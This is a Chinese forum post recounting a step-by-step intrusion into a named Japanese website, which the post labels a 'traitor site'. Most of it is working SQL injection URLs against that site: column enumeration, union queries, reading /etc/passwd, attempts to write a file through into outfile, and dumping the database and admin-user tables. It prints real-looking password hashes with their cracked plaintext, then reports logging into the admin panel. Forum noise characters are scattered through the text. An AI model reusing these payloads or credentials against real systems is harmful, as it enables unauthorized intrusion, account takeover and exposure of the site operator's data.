原创 检测汉奸站全过程

xiancda

补：www.zuaa.jp测试

3 h0 b" g; K* Y' W
3 R; L5 [4 [0 Y: _* ~0x01. 检测 www.zuaa.jp 收集数据
4 {& J4 ]4 N; o8 a; W0 h! ~
2 a! C# W8 `  ~
+ {0 @7 u. X- z! N+ \5 Q& Lwhatweb
) B& H$ d0 b  I. @

利用NMAP扫描

中国网络渗透测评联盟：http://www.political-security.com/ 提供技术支持
8 @  c2 c( v' D. M$ i0x02.找注入点
找注入点：http://www.zuaa.jp/php/newsdetail.php?topic_id=390
7 G+ g  \3 L: K* D4 n3 e0 Y$ w
5 g" A& V% w+ t0 H3 V: F
3 L: R' E  [9 v, U0x03.order by
             http://www.zuaa.jp/php/newsdetail.php?topic_id=390 order by 1
, H5 A& O" y$ s) M$ }
- E, [! y1 ~1 z! W" ?9 qorder by 28报错，order by 27正常

0x04.   union手动查询
3 h3 Q3 G  J$ ghttp://www.zuaa.jp/php/newsdetail.php?topic_id=198%20and%201=2%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27
9 F2 R% t" O2 }+ Z4 ^, ]) [添加到 27 时正常显示

中国网络渗透测评联盟：http://www.political-security.com/ 提供技术支持
) b5 m' [1 }- Q: N% F& j
! W9 R" b1 V5 c* h; ?* L$ n0x05. info:
$ v9 k3 j! q- J. D. I9 t( Vhttp://www.zuaa.jp/php/newsdetail.php?topic_id=198%20and%201=2%20union%20select%201,2,group_concat(user(),0x3a,database(),0x3a,version(),0x3a,@@version_conpile_os),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27

+ N3 b. ?& ?2 v1 \1 o; Z7 O% ?user:            root@localhost
( h* h* `7 Z6 o& j4 `; d: rdatabase:    openpne
version:      4.1.22
. h: a' W$ N/ }9 Vos:             portbld-freebsd5.4
3 l" u6 a" L' t/ z" o
0x06. root用户
" c7 r  ^2 G4 a+ D1 k  ]利用 load_file(0x...), 读文件 (/etc/passwd), 也可以这样 hex(load_file(0x.....)), 然后把得到的 hex ,再转换成字符的（这种方法， 可以过大多数站）
http://www.zuaa.jp/php/newsdetail.php?topic_id=198%20and%201=2%20union%20select%201,2,hex(load_file(0x2f6574632f706173737764)),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27

通过工具转换
: m7 I: Y9 s( O$ w
  z& L6 m" Z! T( v/ t9 i, ?中国网络渗透测评联盟：http://www.political-security.com/ 提供技术支持
. O7 A! L0 U5 ?8 E* ~: S. m) K
% `0 s1 h- A/ [9 a1 v0x07. 利用 into outfile
. Z5 }. x1 A5 j5 U全部都失败
http://www.zuaa.jp/php/newsdetail.php?topic_id=-390+UNION+SELECT+1,2,0x31,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+into+outfile+'/usr/home/zuaa_tech/WEBSITE/htdocs/php/help.php
: _( F) S4 [- Y( @  _2 S) s
http://www.zuaa.jp/php/newsdetail.php?topic_id=-390+UNION+SELECT+1,2,0x31,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+into+outfile+'/usr/home/qian/OpenPNE/lib/help.php

! H  S+ ]& |4 e6 C2 i" Z; V6 G3 E页面显示“MDB2 Error:syntax error”

0x08. 利用 mysql 4.1
( [# @0 f6 M% r8 c+ [猜常规表名，字段未果 工具 sqlmap
( {: v+ `! a1 `( e6 ^- q中国网络渗透测评联盟：http://www.political-security.com/ 提供技术支持
; }' Y" r) K# z! t  B
7 ^& S) t9 J# b* [- d

0x09. 查找后台
# y, H9 k% h/ a; H( t利用 现有的各种 后台工具尝试都不行

. c# v0 n# R$ _5 l! {0 K0x10.  MySL外联方法
从前面 nmap 收集的信息当中，可以看到开了 mysql 3306 端口 ,尝试得 mysql 用户各密码，然后再通过 mysql 工具外连 www.zuaa.jp 不行
可以利用 mysql ( 4.x 5.) 自带的定义表 mysql.user
http://www.zuaa.jp/php/newsdetail.php?topic_id=-390+UNION+SELECT+1,2,group_concat(user,0x3a,password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+from+mysql.user
2 ?  x0 d# u5 T3 a4 Y
这个可以在 www.cmd5.com 解密
8 J! z, U( R* jroot:*3711D518F2924AEFA6F4C6B4B7425CAE8BEB88AB zuaa2009
$ p# \! N$ I; ~+ M, H1 h% lchen:*2A09A939E6B654877DD70B00EA631D1007E58CC9 silkroad97
openpne:*5D80C62EC4D258534F 07D08CCE9CE27DFF26A366 ???
( S' D* Z$ C$ f$ O4 Szuaa:*5D80C62EC4D258534F07D08CCE9CE27DFF26A366 ???
工具外连失败，据说防火墙策略只允许特定IP外连，具体不得知
5 t+ J" a6 s- _) S% G5 \
( v. ]7 }) i' C! F6 C
0x11. 网站突破
发现网站的源程序 openpne, google 下载 openpne 源码

6 ?- T6 |3 @0 T
0x12. 默认信息利用
http://sns.zuaa.jp/?m=admin&a=page_login
0 ^" i. @8 f* M- j0 w
% h6 j3 N2 H( S  }. h) V* o表名 (c_admin_user) ，字段名（username,password）
/ z4 S) Q2 m, whttp://www.zuaa.jp/php/newsdetail.php?topic_id=-390+UNION+SELECT+1,2,group_concat(username,0x3a,password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+from+c_admin_user

. x1 o5 K4 l8 J+ U- P/ i9 |解密
+ r, O, b& n% t2 E6 lzuaa_tech:dd041e2 b1b8ecee164a6cb196a496eda,               zuaa2009
) X+ G1 c  _" E0 ~zuaajp:c0923ec5857796a393da99905008c176,          zju1897

中国网络渗透测评联盟：http://www.political-security.com/ 提供技术支持

; s6 V- i. ]7 V0x13. 登录后台
0 W) }' ~& N- |& L  Y) T3 [$ r


' Q, R& ]$ o: Y- o& C  a0x14. 小结
利用网站相关信息，进行突破 利用网站相关信息，进行突破 利用网站相关信息，进行突破 利用网站相关信息，进行突破 。
; |. g3 O, s( ~  Q1 w; z8 c9 A! y感谢群 ---- 渗透 -酷帅王子 提供注入点 提供注入点
------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- -------------------------------------------------------By DarkRain
5 M! u9 A; E0 v( m1 W中国网络渗透测评联盟：http://www.political-security.com/ 提供技术支持
9 [; e! o/ {/ l$ c
  Z# @! t9 F: N5 K最后声明：本人只负责了整理上传到论坛，让大家学习，不是原作者，原作者辛苦了！

荒村狂客

哪个牛人 费的这劲 入侵的